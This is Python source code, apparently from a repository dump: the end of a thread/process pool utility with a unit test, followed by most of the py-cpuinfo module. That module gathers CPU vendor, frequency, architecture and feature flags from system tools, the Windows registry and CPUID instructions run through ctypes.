self._start_task(i)
def _start_task(self, task):
""""""
self.current_thread_count = self.current_thread_count + 1
try:
if self.mode == 'thread':
#print 'Start'
Thread(target=self._worker, args=(task,)).start()
elif self.mode == 'process':
Process(target=self._worker, args=(task,)).start()
except TypeError:
self.current_thread_count = self.current_thread_count - 1
def _worker(self, dictobj):
""""""
func = dictobj['func']
args = dictobj['args']
argv = dictobj['argv']
result = func(*args, **argv)
self.lock.acquire()
self._add_result_to_queue(result=result)
self.lock.release()
def _add_result_to_queue(self, **kw):
""""""
        assert 'result' in kw, '[!] worker produced no result'
self.result_queue.put(kw['result'])
self.current_thread_count = self.current_thread_count - 1
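# A minimal usage sketch of Pool (mirrored by UtilsTest.test_pool below); results
# arrive on the returned Queue in completion order, not submission order:
#     pool = Pool(thread_max=10, mode='thread')
#     pool.add_task(some_callable, arg)
#     results = pool.run()    # returns the Queue immediately
#     value = results.get()   # blocks until one task has finished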
class UtilsTest(unittest.TestCase):
    def runTest(self):
        # Find and invoke every test_* method without resorting to eval().
        for name, member in inspect.getmembers(self):
            if name.startswith('test_') and callable(member):
                member()
def test_pool(self):
def demo_task(*args):
'''simulate the plugin.run'''
print '[!] Computing!'
time.sleep(args[0])
print '[!] Finished!'
print
returns = 'Runtime Length : %s' % str(args)
return returns
pool = Pool(mode='thread')
pool.add_task(demo_task, 7)
pool.add_task(demo_task, 3)
q = pool.run()
print pool.current_thread_count
self.assertIsInstance(q, Queue)
r = q.get()
print r
self.assertIsInstance(r, str)
r = q.get()
print r
self.assertIsInstance(r, str)
print pool.current_thread_count
if __name__ == '__main__':
unittest.main()
|
cpuinfo.py
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Copyright (c) 2014-2018, Matthew Brennan Jones <matthew.brennan.jones@gmail.com>
# Py-cpuinfo gets CPU info with pure Python 2 & 3
# It uses the MIT License
# It is hosted at: https://github.com/workhorsy/py-cpuinfo
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
CPUINFO_VERSION = (4, 0, 0)
import os, sys
import glob
import re
import time
import platform
import multiprocessing
import ctypes
import pickle
import base64
import subprocess
try:
import _winreg as winreg
except ImportError as err:
try:
import winreg
except ImportError as err:
pass
PY2 = sys.version_info[0] == 2
# Load hacks for Windows
if platform.system().lower() == 'windows':
# Monkey patch multiprocessing's Popen to fork properly on Windows Pyinstaller
# https://github.com/pyinstaller/pyinstaller/wiki/Recipe-Multiprocessing
try:
import multiprocessing.popen_spawn_win32 as forking
except ImportError as err:
try:
import multiprocessing.popen_fork as forking
except ImportError as err:
import multiprocessing.forking as forking
class _Popen(forking.Popen):
def __init__(self, *args, **kw):
if hasattr(sys, 'frozen'):
# We have to set original _MEIPASS2 value from sys._MEIPASS
# to get --onefile mode working.
os.putenv('_MEIPASS2', sys._MEIPASS)
try:
super(_Popen, self).__init__(*args, **kw)
finally:
if hasattr(sys, 'frozen'):
# On some platforms (e.g. AIX) 'os.unsetenv()' is not
# available. In those cases we cannot delete the variable
# but only set it to the empty string. The bootloader
# can handle this case.
if hasattr(os, 'unsetenv'):
os.unsetenv('_MEIPASS2')
else:
os.putenv('_MEIPASS2', '')
forking.Popen = _Popen
class DataSource(object):
bits = platform.architecture()[0]
cpu_count = multiprocessing.cpu_count()
is_windows = platform.system().lower() == 'windows'
raw_arch_string = platform.machine()
can_cpuid = True
@staticmethod
def has_proc_cpuinfo():
return os.path.exists('/proc/cpuinfo')
@staticmethod
def has_dmesg():
return len(program_paths('dmesg')) > 0
@staticmethod
def has_var_run_dmesg_boot():
uname = platform.system().strip().strip('"').strip("'").strip().lower()
return 'linux' in uname and os.path.exists('/var/run/dmesg.boot')
@staticmethod
def has_cpufreq_info():
return len(program_paths('cpufreq-info')) > 0
@staticmethod
def has_sestatus():
return len(program_paths('sestatus')) > 0
@staticmethod
def has_sysctl():
return len(program_paths('sysctl')) > 0
@staticmethod
def has_isainfo():
return len(program_paths('isainfo')) > 0
@staticmethod
def has_kstat():
return len(program_paths('kstat')) > 0
@staticmethod
def has_sysinfo():
return len(program_paths('sysinfo')) > 0
@staticmethod
def has_lscpu():
return len(program_paths('lscpu')) > 0
@staticmethod
def has_ibm_pa_features():
return len(program_paths('lsprop')) > 0
@staticmethod
def has_wmic():
returncode, output = run_and_get_stdout(['wmic', 'os', 'get', 'Version'])
return returncode == 0 and len(output) > 0
@staticmethod
def cat_proc_cpuinfo():
return run_and_get_stdout(['cat', '/proc/cpuinfo'])
@staticmethod
def cpufreq_info():
return run_and_get_stdout(['cpufreq-info'])
@staticmethod
def sestatus_allow_execheap():
return run_and_get_stdout(['sestatus', '-b'], ['grep', '-i', '"allow_execheap"'])[1].strip().lower().endswith('on')
@staticmethod
def sestatus_allow_execmem():
return run_and_get_stdout(['sestatus', '-b'], ['grep', '-i', '"allow_execmem"'])[1].strip().lower().endswith('on')
@staticmethod
def dmesg_a():
return run_and_get_stdout(['dmesg', '-a'])
@staticmethod
def cat_var_run_dmesg_boot():
return run_and_get_stdout(['cat', '/var/run/dmesg.boot'])
@staticmethod
def sysctl_machdep_cpu_hw_cpufrequency():
return run_and_get_stdout(['sysctl', 'machdep.cpu', 'hw.cpufrequency'])
@staticmethod
def isainfo_vb():
return run_and_get_stdout(['isainfo', '-vb'])
@staticmethod
def kstat_m_cpu_info():
return run_and_get_stdout(['kstat', '-m', 'cpu_info'])
@staticmethod
def sysinfo_cpu():
return run_and_get_stdout(['sysinfo', '-cpu'])
@staticmethod
def lscpu():
return run_and_get_stdout(['lscpu'])
@staticmethod
def ibm_pa_features():
ibm_features = glob.glob('/proc/device-tree/cpus/*/ibm,pa-features')
if ibm_features:
return run_and_get_stdout(['lsprop', ibm_features[0]])
@staticmethod
def wmic_cpu():
return run_and_get_stdout(['wmic', 'cpu', 'get', 'Name,CurrentClockSpeed,L2CacheSize,L3CacheSize,Description,Caption,Manufacturer', '/format:list'])
@staticmethod
def winreg_processor_brand():
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"Hardware\Description\System\CentralProcessor\0")
processor_brand = winreg.QueryValueEx(key, "ProcessorNameString")[0]
winreg.CloseKey(key)
return processor_brand
@staticmethod
def winreg_vendor_id():
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"Hardware\Description\System\CentralProcessor\0")
vendor_id = winreg.QueryValueEx(key, "VendorIdentifier")[0]
winreg.CloseKey(key)
return vendor_id
@staticmethod
def winreg_raw_arch_string():
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SYSTEM\CurrentControlSet\Control\Session Manager\Environment")
raw_arch_string = winreg.QueryValueEx(key, "PROCESSOR_ARCHITECTURE")[0]
winreg.CloseKey(key)
return raw_arch_string
@staticmethod
def winreg_hz_actual():
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"Hardware\Description\System\CentralProcessor\0")
hz_actual = winreg.QueryValueEx(key, "~Mhz")[0]
winreg.CloseKey(key)
hz_actual = to_hz_string(hz_actual)
return hz_actual
@staticmethod
def winreg_feature_bits():
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"Hardware\Description\System\CentralProcessor\0")
feature_bits = winreg.QueryValueEx(key, "FeatureSet")[0]
winreg.CloseKey(key)
return feature_bits
def obj_to_b64(thing):
a = thing
b = pickle.dumps(a)
c = base64.b64encode(b)
d = c.decode('utf8')
return d
def b64_to_obj(thing):
try:
a = base64.b64decode(thing)
b = pickle.loads(a)
return b
except:
return {}
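# obj_to_b64/b64_to_obj are a pickle + base64 round trip so that arbitrary Python
# objects can be passed around as plain text; b64_to_obj deliberately swallows any
# decode error and falls back to {}. Illustrative round trip:
#     b64_to_obj(obj_to_b64({'arch': 'X86_64'})) == {'arch': 'X86_64'}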
def run_and_get_stdout(command, pipe_command=None):
if not pipe_command:
p1 = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
output = p1.communicate()[0]
if not PY2:
output = output.decode(encoding='UTF-8')
return p1.returncode, output
else:
p1 = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
p2 = subprocess.Popen(pipe_command, stdin=p1.stdout, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
p1.stdout.close()
output = p2.communicate()[0]
if not PY2:
output = output.decode(encoding='UTF-8')
return p2.returncode, output
def program_paths(program_name):
paths = []
exts = filter(None, os.environ.get('PATHEXT', '').split(os.pathsep))
path = os.environ['PATH']
for p in os.environ['PATH'].split(os.pathsep):
p = os.path.join(p, program_name)
if os.access(p, os.X_OK):
paths.append(p)
for e in exts:
pext = p + e
if os.access(pext, os.X_OK):
paths.append(pext)
return paths
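# program_paths() scans every directory on PATH for an executable with the given
# name, also trying the PATHEXT suffixes (.EXE, .BAT, ...) that Windows defines.
# For instance, on a typical Linux box program_paths('lscpu') might return
# ['/usr/bin/lscpu']; the exact paths naturally depend on the host.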
def _get_field_actual(cant_be_number, raw_string, field_names):
for line in raw_string.splitlines():
for field_name in field_names:
field_name = field_name.lower()
if ':' in line:
left, right = line.split(':', 1)
left = left.strip().lower()
right = right.strip()
if left == field_name and len(right) > 0:
if cant_be_number:
if not right.isdigit():
return right
else:
return right
return None
def _get_field(cant_be_number, raw_string, convert_to, default_value, *field_names):
retval = _get_field_actual(cant_be_number, raw_string, field_names)
# Convert the return value
if retval and convert_to:
try:
retval = convert_to(retval)
except:
retval = default_value
# Return the default if there is no return value
if retval is None:
retval = default_value
return retval
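# _get_field() pulls one "name: value" entry out of raw tool output such as
# /proc/cpuinfo, trying each candidate field name in turn. A worked example:
#     _get_field(False, 'cpu MHz : 2800.000', float, 0.0, 'cpu mhz')  # -> 2800.0
# With cant_be_number=True a purely numeric value is rejected, which guards fields
# like vendor_id against bogus all-digit matches.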
def _get_hz_string_from_brand(processor_brand):
# Just return 0 if the processor brand does not have the Hz
if not 'hz' in processor_brand.lower():
return (1, '0.0')
hz_brand = processor_brand.lower()
scale = 1
if hz_brand.endswith('mhz'):
scale = 6
elif hz_brand.endswith('ghz'):
scale = 9
if '@' in hz_brand:
hz_brand = hz_brand.split('@')[1]
else:
hz_brand = hz_brand.rsplit(None, 1)[1]
hz_brand = hz_brand.rstrip('mhz').rstrip('ghz').strip()
hz_brand = to_hz_string(hz_brand)
return (scale, hz_brand)
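# _get_hz_string_from_brand() recovers the advertised clock from a brand string.
# For example, 'Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz' yields (9, '3.4'), i.e.
# 3.4 scaled by 10**9; a brand with no Hz figure at all yields (1, '0.0').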
def to_friendly_hz(ticks, scale):
# Get the raw Hz as a string
left, right = to_raw_hz(ticks, scale)
ticks = '{0}.{1}'.format(left, right)
# Get the location of the dot, and remove said dot
dot_index = ticks.index('.')
ticks = ticks.replace('.', '')
# Get the Hz symbol and scale
symbol = "Hz"
scale = 0
if dot_index > 9:
symbol = "GHz"
scale = 9
elif dot_index > 6:
symbol = "MHz"
scale = 6
elif dot_index > 3:
symbol = "KHz"
scale = 3
# Get the Hz with the dot at the new scaled point
ticks = '{0}.{1}'.format(ticks[:-scale-1], ticks[-scale-1:])
# Format the ticks to have 4 numbers after the decimal
# and remove any superfluous zeroes.
ticks = '{0:.4f} {1}'.format(float(ticks), symbol)
ticks = ticks.rstrip('0')
return ticks
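# to_friendly_hz() renders the human-readable form, e.g. to_friendly_hz('3.4', 9)
# gives '3.4000 GHz' (the value keeps four decimal places because the
# trailing-zero strip runs after the unit has been appended).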
def to_raw_hz(ticks, scale):
# Scale the numbers
ticks = ticks.lstrip('0')
old_index = ticks.index('.')
ticks = ticks.replace('.', '')
ticks = ticks.ljust(scale + old_index+1, '0')
new_index = old_index + scale
ticks = '{0}.{1}'.format(ticks[:new_index], ticks[new_index:])
left, right = ticks.split('.')
left, right = int(left), int(right)
return (left, right)
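# to_raw_hz() converts the same (value, scale) pair into integer Hz plus a
# fractional remainder, e.g. to_raw_hz('3.4', 9) == (3400000000, 0).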
def to_hz_string(ticks):
# Convert to string
ticks = '{0}'.format(ticks)
# Add decimal if missing
if '.' not in ticks:
ticks = '{0}.0'.format(ticks)
# Remove trailing zeros
ticks = ticks.rstrip('0')
# Add one trailing zero for empty right side
if ticks.endswith('.'):
ticks = '{0}0'.format(ticks)
return ticks
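# to_hz_string() normalises a frequency into a canonical decimal string,
# e.g. to_hz_string(2800) == '2800.0' and to_hz_string('2.80') == '2.8'.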
def to_friendly_bytes(input):
if not input:
return input
input = "{0}".format(input)
formats = {
r"^[0-9]+B$" : 'B',
r"^[0-9]+K$" : 'KB',
r"^[0-9]+M$" : 'MB',
r"^[0-9]+G$" : 'GB'
}
for pattern, friendly_size in formats.items():
if re.match(pattern, input):
return "{0} {1}".format(input[ : -1].strip(), friendly_size)
return input
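# to_friendly_bytes() expands the single-letter cache-size suffixes reported by
# some tools, e.g. to_friendly_bytes('256K') == '256 KB'; anything that does not
# match the known patterns is returned unchanged.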
def _parse_cpu_string(cpu_string):
# Get location of fields at end of string
fields_index = cpu_string.find('(', cpu_string.find('@'))
#print(fields_index)
# Processor Brand
processor_brand = cpu_string
if fields_index != -1:
processor_brand = cpu_string[0 : fields_index].strip()
#print('processor_brand: ', processor_brand)
fields = None
if fields_index != -1:
fields = cpu_string[fields_index : ]
#print('fields: ', fields)
# Hz
scale, hz_brand = _get_hz_string_from_brand(processor_brand)
# Various fields
vendor_id, stepping, model, family = (None, None, None, None)
if fields:
try:
fields = fields.rsplit('(', 1)[1].split(')')[0].split(',')
fields = [f.strip().lower() for f in fields]
fields = [f.split(':') for f in fields]
fields = [{f[0].strip() : f[1].strip()} for f in fields]
#print('fields: ', fields)
for field in fields:
name = list(field.keys())[0]
value = list(field.values())[0]
#print('name:{0}, value:{1}'.format(name, value))
if name == 'origin':
vendor_id = value.strip('"')
elif name == 'stepping':
stepping = int(value.lstrip('0x'), 16)
elif name == 'model':
model = int(value.lstrip('0x'), 16)
elif name in ['fam', 'family']:
family = int(value.lstrip('0x'), 16)
except:
#raise
pass
return (processor_brand, hz_brand, scale, vendor_id, stepping, model, family)
def _parse_dmesg_output(output):
try:
# Get all the dmesg lines that might contain a CPU string
lines = output.split(' CPU0:')[1:] + \
output.split(' CPU1:')[1:] + \
output.split(' CPU:')[1:] + \
output.split('\nCPU0:')[1:] + \
output.split('\nCPU1:')[1:] + \
output.split('\nCPU:')[1:]
lines = [l.split('\n')[0].strip() for l in lines]
# Convert the lines to CPU strings
cpu_strings = [_parse_cpu_string(l) for l in lines]
# Find the CPU string that has the most fields
best_string = None
highest_count = 0
for cpu_string in cpu_strings:
count = sum([n is not None for n in cpu_string])
if count > highest_count:
highest_count = count
best_string = cpu_string
# If no CPU string was found, return {}
if not best_string:
return {}
processor_brand, hz_actual, scale, vendor_id, stepping, model, family = best_string
# Origin
if ' Origin=' in output:
fields = output[output.find(' Origin=') : ].split('\n')[0]
fields = fields.strip().split()
fields = [n.strip().split('=') for n in fields]
fields = [{n[0].strip().lower() : n[1].strip()} for n in fields]
#print('fields: ', fields)
for field in fields:
name = list(field.keys())[0]
value = list(field.values())[0]
#print('name:{0}, value:{1}'.format(name, value))
if name == 'origin':
vendor_id = value.strip('"')
elif name == 'stepping':
stepping = int(value.lstrip('0x'), 16)
elif name == 'model':
model = int(value.lstrip('0x'), 16)
elif name in ['fam', 'family']:
family = int(value.lstrip('0x'), 16)
#print('FIELDS: ', (vendor_id, stepping, model, family))
# Features
flag_lines = []
for category in [' Features=', ' Features2=', ' AMD Features=', ' AMD Features2=']:
if category in output:
flag_lines.append(output.split(category)[1].split('\n')[0])
flags = []
for line in flag_lines:
line = line.split('<')[1].split('>')[0].lower()
for flag in line.split(','):
flags.append(flag)
flags.sort()
# Convert from GHz/MHz string to Hz
scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
info = {
'vendor_id' : vendor_id,
'brand' : processor_brand,
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
if hz_advertised and hz_advertised != '0.0':
info['hz_advertised'] = to_friendly_hz(hz_advertised, scale)
info['hz_actual'] = to_friendly_hz(hz_actual, scale)
if hz_advertised and hz_advertised != '0.0':
info['hz_advertised_raw'] = to_raw_hz(hz_advertised, scale)
info['hz_actual_raw'] = to_raw_hz(hz_actual, scale)
return {k: v for k, v in info.items() if v}
except:
#raise
pass
return {}
def parse_arch(raw_arch_string):
arch, bits = None, None
raw_arch_string = raw_arch_string.lower()
# X86
if re.match(r'^i\d86$|^x86$|^x86_32$|^i86pc$|^ia32$|^ia-32$|^bepc$', raw_arch_string):
arch = 'X86_32'
bits = 32
elif re.match('^x64$|^x86_64$|^x86_64t$|^i686-64$|^amd64$|^ia64$|^ia-64$', raw_arch_string):
arch = 'X86_64'
bits = 64
# ARM
elif re.match('^arm64$|^arm64[a-z]$|^arm64-[a-z]$', raw_arch_string):
arch = 'ARM_8'
bits = 64
elif re.match('^armv8-a|aarch64$', raw_arch_string):
arch = 'ARM_8'
bits = 64
elif re.match('^armv7$|^armv7[a-z]$|^armv7-[a-z]$|^armv6[a-z]$', raw_arch_string):
arch = 'ARM_7'
bits = 32
elif re.match('^armv8$|^armv8[a-z]$|^armv8-[a-z]$', raw_arch_string):
arch = 'ARM_8'
bits = 32
# PPC
elif re.match('^ppc32$|^prep$|^pmac$|^powermac$', raw_arch_string):
arch = 'PPC_32'
bits = 32
elif re.match('^powerpc$|^ppc64$|^ppc64le$', raw_arch_string):
arch = 'PPC_64'
bits = 64
# S390X
elif re.match('^s390x$', raw_arch_string):
arch = 'S390X'
bits = 64
# SPARC
elif re.match('^sparc32$|^sparc$', raw_arch_string):
arch = 'SPARC_32'
bits = 32
elif re.match('^sparc64$|^sun4u$|^sun4v$', raw_arch_string):
arch = 'SPARC_64'
bits = 64
return (arch, bits)
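# Illustrative examples (not part of the original module), assuming uname-style
# arch strings like the ones matched above:
# parse_arch('x86_64') -> ('X86_64', 64)
# parse_arch('armv7l') -> ('ARM_7', 32)
# parse_arch('ppc64le') -> ('PPC_64', 64)
# Unrecognized strings fall through to (None, None).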
def is_bit_set(reg, bit):
mask = 1 << bit
is_set = reg & mask > 0
return is_set
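# For reference: 0b1010 has bits 1 and 3 set, so is_bit_set(0b1010, 1) is True
# and is_bit_set(0b1010, 2) is False.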
class CPUID(object):
def __init__(self):
self.prochandle = None
# Figure out if SE Linux is on and in enforcing mode
self.is_selinux_enforcing = False
# Just return if the SE Linux Status Tool is not installed
if not DataSource.has_sestatus():
return
# Figure out if we can execute heap and execute memory
can_selinux_exec_heap = DataSource.sestatus_allow_execheap()
can_selinux_exec_memory = DataSource.sestatus_allow_execmem()
self.is_selinux_enforcing = (not can_selinux_exec_heap or not can_selinux_exec_memory)
def _asm_func(self, restype=None, argtypes=(), byte_code=[]):
byte_code = bytes.join(b'', byte_code)
address = None
if DataSource.is_windows:
# Allocate a memory segment the size of the byte code, and make it executable
size = len(byte_code)
# Alloc at least 1 page to ensure we own all pages that we want to change protection on
if size < 0x1000: size = 0x1000
MEM_COMMIT = ctypes.c_ulong(0x1000)
PAGE_READWRITE = ctypes.c_ulong(0x4)
pfnVirtualAlloc = ctypes.windll.kernel32.VirtualAlloc
pfnVirtualAlloc.restype = ctypes.c_void_p
address = pfnVirtualAlloc(None, ctypes.c_size_t(size), MEM_COMMIT, PAGE_READWRITE)
if not address:
raise Exception("Failed to VirtualAlloc")
# Copy the byte code into the memory segment
memmove = ctypes.CFUNCTYPE(ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_size_t)(ctypes._memmove_addr)
if memmove(address, byte_code, size) < 0:
raise Exception("Failed to memmove")
# Enable execute permissions
PAGE_EXECUTE = ctypes.c_ulong(0x10)
old_protect = ctypes.c_ulong(0)
pfnVirtualProtect = ctypes.windll.kernel32.VirtualProtect
res = pfnVirtualProtect(ctypes.c_void_p(address), ctypes.c_size_t(size), PAGE_EXECUTE, ctypes.byref(old_protect))
if not res:
raise Exception("Failed VirtualProtect")
# Flush Instruction Cache
# First, get process Handle
if not self.prochandle:
pfnGetCurrentProcess = ctypes.windll.kernel32.GetCurrentProcess
pfnGetCurrentProcess.restype = ctypes.c_void_p
self.prochandle = ctypes.c_void_p(pfnGetCurrentProcess())
# Actually flush cache
res = ctypes.windll.kernel32.FlushInstructionCache(self.prochandle, ctypes.c_void_p(address), ctypes.c_size_t(size))
if not res:
raise Exception("Failed FlushInstructionCache")
else:
# Allocate a memory segment the size of the byte code
size = len(byte_code)
pfnvalloc = ctypes.pythonapi.valloc
pfnvalloc.restype = ctypes.c_void_p
address = pfnvalloc(ctypes.c_size_t(size))
if not address:
raise Exception("Failed to valloc")
# Mark the memory segment as writeable only
if not self.is_selinux_enforcing:
WRITE = 0x2
if ctypes.pythonapi.mprotect(ctypes.c_void_p(address), size, WRITE) < 0:
raise Exception("Failed to mprotect")
# Copy the byte code into the memory segment
if ctypes.pythonapi.memmove(ctypes.c_void_p(address), byte_code, ctypes.c_size_t(size)) < 0:
raise Exception("Failed to memmove")
# Mark the memory segment as writeable and executable only
if not self.is_selinux_enforcing:
WRITE_EXECUTE = 0x2 | 0x4
if ctypes.pythonapi.mprotect(ctypes.c_void_p(address), size, WRITE_EXECUTE) < 0:
raise Exception("Failed to mprotect")
# Cast the memory segment into a function
functype = ctypes.CFUNCTYPE(restype, *argtypes)
fun = functype(address)
return fun, address
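# Note: callers are expected to release 'address' themselves once the generated
# function is no longer needed; _run_asm below does so via VirtualFree on Windows
# and mprotect + free elsewhere.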
def _run_asm(self, *byte_code):
# Convert the byte code into a function that returns an int
restype = ctypes.c_uint32
argtypes = ()
func, address = self._asm_func(restype, argtypes, byte_code)
# Call the byte code like a function
retval = func()
byte_code = bytes.join(b'', byte_code)
size = ctypes.c_size_t(len(byte_code))
# Free the function memory segment
if DataSource.is_windows:
MEM_RELEASE = ctypes.c_ulong(0x8000)
ctypes.windll.kernel32.VirtualFree(ctypes.c_void_p(address), ctypes.c_size_t(0), MEM_RELEASE)
else:
# Remove the executable tag on the memory
READ_WRITE = 0x1 | 0x2
if ctypes.pythonapi.mprotect(ctypes.c_void_p(address), size, READ_WRITE) < 0:
raise Exception("Failed to mprotect")
ctypes.pythonapi.free(ctypes.c_void_p(address))
return retval
# FIXME: We should not have to use different instructions to
# set eax to 0 or 1, on 32bit and 64bit machines.
def _zero_eax(self):
return (
b"\x31\xC0" # xor eax,eax
)
def _zero_ecx(self):
return (
b"\x31\xC9" # xor ecx,ecx
)
def _one_eax(self):
return (
b"\xB8\x01\x00\x00\x00" # mov eax,0x1
)
# http://en.wikipedia.org/wiki/CPUID#EAX.3D0:_Get_vendor_ID
def get_vendor_id(self):
# EBX
ebx = self._run_asm(
self._zero_eax(),
b"\x0F\xA2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
self._zero_eax(),
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# EDX
edx = self._run_asm(
self._zero_eax(),
b"\x0f\xa2" # cpuid
b"\x89\xD0" # mov ax,dx
b"\xC3" # ret
)
# Each byte (8 bits) of EBX, EDX, and ECX is one ASCII character of the vendor name
vendor_id = []
for reg in [ebx, edx, ecx]:
for n in [0, 8, 16, 24]:
vendor_id.append(chr((reg >> n) & 0xFF))
vendor_id = ''.join(vendor_id)
return vendor_id
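# The 12 characters come from EBX, EDX, ECX in that order, e.g. 'GenuineIntel'
# or 'AuthenticAMD' on typical x86 hardware.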
# http://en.wikipedia.org/wiki/CPUID#EAX.3D1:_Processor_Info_and_Feature_Bits
def get_info(self):
# EAX
eax = self._run_asm(
self._one_eax(),
b"\x0f\xa2" # cpuid
b"\xC3" # ret
)
# Get the CPU info
stepping = (eax >> 0) & 0xF # 4 bits
model = (eax >> 4) & 0xF # 4 bits
family = (eax >> 8) & 0xF # 4 bits
processor_type = (eax >> 12) & 0x3 # 2 bits
extended_model = (eax >> 16) & 0xF # 4 bits
extended_family = (eax >> 20) & 0xFF # 8 bits
return {
'stepping' : stepping,
'model' : model,
'family' : family,
'processor_type' : processor_type,
'extended_model' : extended_model,
'extended_family' : extended_family
}
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000000h:_Get_Highest_Extended_Function_Supported
def get_max_extension_support(self):
# Check for extension support
max_extension_support = self._run_asm(
b"\xB8\x00\x00\x00\x80" # mov ax,0x80000000
b"\x0f\xa2" # cpuid
b"\xC3" # ret
)
return max_extension_support
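# On most modern x86 CPUs this is at least 0x80000008, which makes the brand
# string (0x80000002-0x80000004) and L2 cache (0x80000006) leaves used below available.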
# http://en.wikipedia.org/wiki/CPUID#EAX.3D1:_Processor_Info_and_Feature_Bits
def get_flags(self, max_extension_support):
# EDX
edx = self._run_asm(
self._one_eax(),
b"\x0f\xa2" # cpuid
b"\x89\xD0" # mov ax,dx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
self._one_eax(),
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# Get the CPU flags
flags = {
'fpu' : is_bit_set(edx, 0),
'vme' : is_bit_set(edx, 1),
'de' : is_bit_set(edx, 2),
'pse' : is_bit_set(edx, 3),
'tsc' : is_bit_set(edx, 4),
'msr' : is_bit_set(edx, 5),
'pae' : is_bit_set(edx, 6),
'mce' : is_bit_set(edx, 7),
'cx8' : is_bit_set(edx, 8),
'apic' : is_bit_set(edx, 9),
#'reserved1' : is_bit_set(edx, 10),
'sep' : is_bit_set(edx, 11),
'mtrr' : is_bit_set(edx, 12),
'pge' : is_bit_set(edx, 13),
'mca' : is_bit_set(edx, 14),
'cmov' : is_bit_set(edx, 15),
'pat' : is_bit_set(edx, 16),
'pse36' : is_bit_set(edx, 17),
'pn' : is_bit_set(edx, 18),
'clflush' : is_bit_set(edx, 19),
#'reserved2' : is_bit_set(edx, 20),
'dts' : is_bit_set(edx, 21),
'acpi' : is_bit_set(edx, 22),
'mmx' : is_bit_set(edx, 23),
'fxsr' : is_bit_set(edx, 24),
'sse' : is_bit_set(edx, 25),
'sse2' : is_bit_set(edx, 26),
'ss' : is_bit_set(edx, 27),
'ht' : is_bit_set(edx, 28),
'tm' : is_bit_set(edx, 29),
'ia64' : is_bit_set(edx, 30),
'pbe' : is_bit_set(edx, 31),
'pni' : is_bit_set(ecx, 0),
'pclmulqdq' : is_bit_set(ecx, 1),
'dtes64' : is_bit_set(ecx, 2),
'monitor' : is_bit_set(ecx, 3),
'ds_cpl' : is_bit_set(ecx, 4),
'vmx' : is_bit_set(ecx, 5),
'smx' : is_bit_set(ecx, 6),
'est' : is_bit_set(ecx, 7),
'tm2' : is_bit_set(ecx, 8),
'ssse3' : is_bit_set(ecx, 9),
'cid' : is_bit_set(ecx, 10),
#'reserved3' : is_bit_set(ecx, 11),
'fma' : is_bit_set(ecx, 12),
'cx16' : is_bit_set(ecx, 13),
'xtpr' : is_bit_set(ecx, 14),
'pdcm' : is_bit_set(ecx, 15),
#'reserved4' : is_bit_set(ecx, 16),
'pcid' : is_bit_set(ecx, 17),
'dca' : is_bit_set(ecx, 18),
'sse4_1' : is_bit_set(ecx, 19),
'sse4_2' : is_bit_set(ecx, 20),
'x2apic' : is_bit_set(ecx, 21),
'movbe' : is_bit_set(ecx, 22),
'popcnt' : is_bit_set(ecx, 23),
'tscdeadline' : is_bit_set(ecx, 24),
'aes' : is_bit_set(ecx, 25),
'xsave' : is_bit_set(ecx, 26),
'osxsave' : is_bit_set(ecx, 27),
'avx' : is_bit_set(ecx, 28),
'f16c' : is_bit_set(ecx, 29),
'rdrnd' : is_bit_set(ecx, 30),
'hypervisor' : is_bit_set(ecx, 31)
}
# Get a list of only the flags that are true
flags = [k for k, v in flags.items() if v]
# http://en.wikipedia.org/wiki/CPUID#EAX.3D7.2C_ECX.3D0:_Extended_Features
if max_extension_support >= 7:
# EBX
ebx = self._run_asm(
self._zero_ecx(),
b"\xB8\x07\x00\x00\x00" # mov eax,7
b"\x0f\xa2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
self._zero_ecx(),
b"\xB8\x07\x00\x00\x00" # mov eax,7
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# Get the extended CPU flags
extended_flags = {
#'fsgsbase' : is_bit_set(ebx, 0),
#'IA32_TSC_ADJUST' : is_bit_set(ebx, 1),
'sgx' : is_bit_set(ebx, 2),
'bmi1' : is_bit_set(ebx, 3),
'hle' : is_bit_set(ebx, 4),
'avx2' : is_bit_set(ebx, 5),
#'reserved' : is_bit_set(ebx, 6),
'smep' : is_bit_set(ebx, 7),
'bmi2' : is_bit_set(ebx, 8),
'erms' : is_bit_set(ebx, 9),
'invpcid' : is_bit_set(ebx, 10),
'rtm' : is_bit_set(ebx, 11),
